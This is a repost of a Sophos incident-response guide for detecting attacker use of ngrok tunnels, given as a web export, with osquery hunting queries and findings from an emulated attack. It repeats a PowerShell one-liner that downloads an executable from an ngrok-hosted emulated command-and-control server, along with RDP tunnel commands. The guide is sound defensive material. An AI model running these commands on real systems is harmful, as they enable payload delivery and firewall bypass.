{"id":19594,"date":"2022-07-14T01:20:58","date_gmt":"2022-07-14T09:20:58","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2022\/07\/14\/news-13327\/"},"modified":"2022-07-14T01:20:58","modified_gmt":"2022-07-14T09:20:58","slug":"news-13327","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/07\/14\/news-13327\/","title":{"rendered":"Rapid Response: The Ngrok Incident Guide"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/07\/122024889_m.jpg\"\/><\/p>\n<p><strong>Credit to Author: Angela Gunn| Date: Thu, 14 Jul 2022 08:01:51 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p><em>This article is part of a series of step-by-step incident guides created by the Sophos Rapid Response team to help incident responders and security-operations teams identify and remediate widely seen threat tools, techniques, and behaviors.<\/em><\/p>\n<p><b><span data-contrast=\"auto\">What Is Ngrok and How Is It Used by Threat Actors?<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Ngrok is a cross-platform tool that exposes local network ports to the internet via secure tunneling.\u00a0 It provides secure tunnels between the internet and computer systems that exist behind a firewall or Network Access Translation (NAT) solution, and which use the Transmission Control Protocol (TCP). Once a port has been chosen as the desired communication channel, the necessary tunneling configurations are set up within the ngrok process. Ngrok\u2019s cloud services facilitate two-way network traffic that is relayed back to the running ngrok process and forwards the network traffic to the specified local port.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">A limited version of the tool is freely available at <\/span><a href=\"https:\/\/ngrok.com\/\"><span data-contrast=\"none\">ngrok.com<\/span><\/a><span data-contrast=\"auto\"> for noncommercial use, and a fuller-fledged version\u00a0can be licensed for commercial use. Unfortunately, it also figures into various attack strategies when malicious actors use its tunneling capabilities to connect to command-and-control (C2) servers, download malicious code, and so forth while bypassing network protections.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Other likely reasons for its popularity with attackers include:\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<ul>\n<li>Used for legitimate business reasons, which means it is not classed as malware by default<\/li>\n<li>Operates over common open ports<\/li>\n<li><span data-contrast=\"auto\">No direct file dependencies<\/span><\/li>\n<li>Easily configured<\/li>\n<li>Supports any network service that uses the TCP protocol<\/li>\n<li>Accommodates the creation of TCP tunnels, coupled with the basic access of exposing local ports (3389) for access across an internet connection<\/li>\n<li>Enables adversaries to retrieve payloads through public ngrok services (since all the network traffic passes through ngrok URLs)<\/li>\n<\/ul>\n<p><b><span data-contrast=\"auto\">Incident Guide Context<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This guide only addresses the investigation and mitigation of incidents involving the detection of ngrok on the network. <\/span><i><span data-contrast=\"auto\">We strongly recommend that responders ascertain whether ngrok is in use on their network for legitimate purposes before proceeding with mitigation.<\/span><\/i><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The guide uses features of\u202f<\/span><a href=\"https:\/\/www.sophos.com\/en-us\/products\/endpoint-antivirus\/xdr\"><span data-contrast=\"none\">Sophos XDR<\/span><\/a><span data-contrast=\"none\">, <\/span><span data-contrast=\"auto\">such as Live Discover and Live Response, to illustrate the steps defenders can take. Security professionals that are not using Sophos XDR but have access to other tools such as\u202f<\/span><a href=\"https:\/\/osquery.io\/\"><span data-contrast=\"none\">OSQuery<\/span><\/a><span data-contrast=\"auto\">\u202fcan adapt and apply the information to their needs.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Queries and commands referenced in the guide are some of the methods used by the\u202f<\/span><a href=\"https:\/\/www.sophos.com\/en-us\/products\/managed-threat-response\/rapid-response\"><span data-contrast=\"none\">Sophos Rapid Response<\/span><\/a><span data-contrast=\"auto\">\u202fteam during incident engagements. They are recommendations only; there will be other ways of accomplishing each task.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Any instructions to remove items should be double-checked to prevent the accidental removal of legitimate client configurations.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h3><b><span data-contrast=\"auto\">Investigate<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">The goal of this section is to establish if there are any Indicators of Compromise (IOC) on the affected system that are related to ngrok. In subsequent sections we will provide steps to analyze and respond to the results of investigation. For purposes of illustration, we will draw on two separate response scenarios in these sections. We will occasionally use <span style=\"color: #99cc00\"><span style=\"color: #ff6600;font-family: SophosSansSemibold, Helvetica Neue, Helvetica, Arial, sans-serif\"><b><span style=\"color: #99cc00\">green<\/span> <\/b><\/span><\/span>text to draw attention to significant details.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\"><u>Check for Live Processes<\/u><\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">First, run a query on the network to check the currently running processes.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos XDR customers can create and run new Live Discover queries to do this. If you are new to Live Discover, the <\/span><a href=\"https:\/\/developer.sophos.com\/getting-started-with-live-discover\"><span data-contrast=\"none\">help guide<\/span><\/a><span data-contrast=\"auto\"> can assist you in putting those together. The basic steps are as follows:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<ol>\n<li>Login to Sophos Central, then go to Threat Analysis Center &gt; Live Discover<\/li>\n<li>Enable \u201cDesigner Mode\u201d<\/li>\n<li>Select \u201cCreate new query\u201d<\/li>\n<li>Give your query a name and description and select a category under which to store it. Be sure to select \u201cLive Endpoint\u201d<\/li>\n<li>Copy the SQL details from the Rapid Response GitHub page: <a href=\"https:\/\/github.com\/SophosRapidResponse\/OSQuery\/blob\/main\/Process\/Process.01.0%20-%20List%20running%20processes.txt\">Process.01.0 \u2013 List running processes tool.txt<\/a><\/li>\n<li>Save the query<\/li>\n<\/ol>\n<ul>\n<li><strong>Live processes<\/strong>\n<ul>\n<li>ngrok.exe\n<ul>\n<li>ngrok runs at the command-line level; potential parent processes include:\n<ul>\n<li>CMD.exe<\/li>\n<li>PowerShell.exe<\/li>\n<\/ul>\n<\/li>\n<li>CMDline parameters\n<ul>\n<li>CMDline parameters\n<ul>\n<li>RDP TCP 3389 tunnel\n<ul>\n<li><span style=\"color: #99cc00\"><strong>ngrok.exe tcp 3389<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<li>HTTP 443\n<ul>\n<li><span style=\"color: #99cc00\"><strong>ngrok http 443<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>In our example, we ran some queries on DNS, HTTP, and PowerShell checking for any signs of ngrok. These are presented here along with the findings.<\/p>\n<ul>\n<li><u><strong>Journal testing: Downloaded IP Scanner payload via ngrok<\/strong><\/u>\n<ul>\n<li>Command invoked on the target computer\n<ul>\n<li>powershell.exe \/c (new-object System.Net.WebClient).DownloadFile(&#8216;https:\/\/3812-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe&#8217;,&#8217;C:PerflogsIP.exe&#8217;)\n<ul>\n<li><strong>https:\/\/3812-84-69-26-216.ngrok.io<\/strong> &gt; ngrok tunnel setup on the source computer (emulated attackers command &amp; control) that points to <strong>C:PerflogsAdvanced_IP_Scanner_2.5.3850.exe<\/strong><\/li>\n<li><strong>Advanced_IP_Scanner_2.5.3850.exe<\/strong> &gt; Payload on the source computer<\/li>\n<li><strong>C:PerflogsIP.exe<\/strong> &gt; Location to write the file to disk on the target computer<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><b><span data-contrast=\"auto\">DNS Journal<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><b><span data-contrast=\"auto\">Finding<\/span><\/b><span data-contrast=\"auto\"> &gt; 3812-84-69-26-216.ngrok.io<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:2520,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"4\"><b><span data-contrast=\"auto\">Dynamic<\/span><\/b><span data-contrast=\"auto\"> (if using free version) &gt; 3812-84-69-26-216<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:2520,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"4\"><b><span data-contrast=\"auto\">Static variable<\/span><\/b><span data-contrast=\"auto\"> &gt; <\/span><span style=\"color: #99cc00\"><b>ngrok<\/b>\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:2520,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"3\" data-aria-level=\"4\"><b><span data-contrast=\"none\">Query &gt; <\/span><\/b><span data-contrast=\"none\">Sophos_dns_journal<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:2520,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"3\" data-aria-level=\"4\">Name\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:2520,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"3\" data-aria-level=\"4\">%ngrok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"2\"><b><span data-contrast=\"none\">HTTP Journal<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><span data-contrast=\"none\">Finding &gt; No finding due to the tunnel operating over port 443 and not 80<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><span class=\"TextRun SCXW10115233 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW10115233 BCX0\"><strong>Query<\/strong> &gt;<\/span><\/span><span class=\"TextRun SCXW10115233 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"> <span class=\"NormalTextRun SpellingErrorV2Themed SCXW10115233 BCX0\">Sophos_HTTP_Journal<\/span><\/span><span class=\"EOP SCXW10115233 BCX0\" data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Finding<\/span><\/b><span data-contrast=\"none\"> (Changed tunnel to port 80) &gt; c5a8-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><span data-contrast=\"none\">&#8220;GET \/Advanced_IP_Scanner_2.5.3850.exe HTTP\/1.1 Host: c5a8-84-69-26-216.ngrok.io Connection: Keep-Alive&#8221;<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Static variable<\/span><\/b><span data-contrast=\"none\">\u00a0&gt; <\/span><span style=\"color: #99cc00\"><b>ngrok<\/b>\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><span class=\"TextRun SCXW173786850 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW173786850 BCX0\">Query<\/span><\/span><span class=\"TextRun SCXW173786850 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW173786850 BCX0\"> &gt; <\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW173786850 BCX0\">Sophos_http_journal<\/span><\/span><span class=\"EOP SCXW173786850 BCX0\" data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\">URL\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\">%ngrok%<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\">Header\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\">%ngrok%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><strong>Grep PSReadline<\/strong>\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Finding<\/span><\/b><span data-contrast=\"none\"> &gt; powershell.exe \/c (new-object System.Net.WebClient).DownloadFile(&#8216;https:\/\/3812-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe&#8217;,&#8217;C:PerflogsIP.exe&#8217;)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Static grep pattern<\/span><\/b><span data-contrast=\"none\"> &gt; <\/span><span data-contrast=\"none\">&#8216;<\/span><span style=\"color: #99cc00\"><b>ngrok<\/b><\/span><span data-contrast=\"none\">&#8216;<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Query custom<\/span><\/b> <b><span data-contrast=\"none\">&gt;<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span>\n<ul>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><span data-contrast=\"none\">SELECT grep.*<\/span><span data-ccp-props=\"{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:2160,&quot;335559731&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><br \/> <\/span><span data-contrast=\"none\">FROM file<\/span><span data-ccp-props=\"{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:2160,&quot;335559731&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><br \/> <\/span><span data-contrast=\"none\">CROSS JOIN grep ON (grep.path = file.path)<\/span><span data-ccp-props=\"{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:2160,&quot;335559731&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><br \/> <\/span><span data-contrast=\"none\">WHERE<\/span><span data-ccp-props=\"{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:2160,&quot;335559731&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><br \/> <\/span><span data-contrast=\"none\">file.path LIKE &#8216;C:Users%AppDataRoamingMicrosoftWindowsPowerShellPSReadLineConsoleHost_history.txt&#8217;<\/span><span data-ccp-props=\"{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:2880,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\"><br \/> <\/span><span data-contrast=\"none\">AND grep.pattern = &#8216;ngrok\u2019<\/span><span data-ccp-props=\"{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559685&quot;:2160,&quot;335559731&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Sophos PowerShell events<\/strong>\n<ul>\n<li><b><span data-contrast=\"none\">Finding<\/span><\/b><span data-contrast=\"none\"> &gt; powershell.exe \/c (new-object System.Net.WebClient).DownloadFile(&#8216;https:\/\/3812-84-69-26-216.ngrok.io\/Advanced_IP_Scanner_2.5.3850.exe&#8217;,&#8217;C:PerflogsIP.exe&#8217;)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1800,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Wingdings&quot;,&quot;469769242&quot;:[9642],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0a7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"3\"><b><span data-contrast=\"none\">Static variable<\/span><\/b><span data-contrast=\"none\"> &gt; <\/span><span style=\"color: #99cc00\"><b>ngrok<\/b>\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0a7\" data-font=\"Wingdings\" data-listid=\"4\" 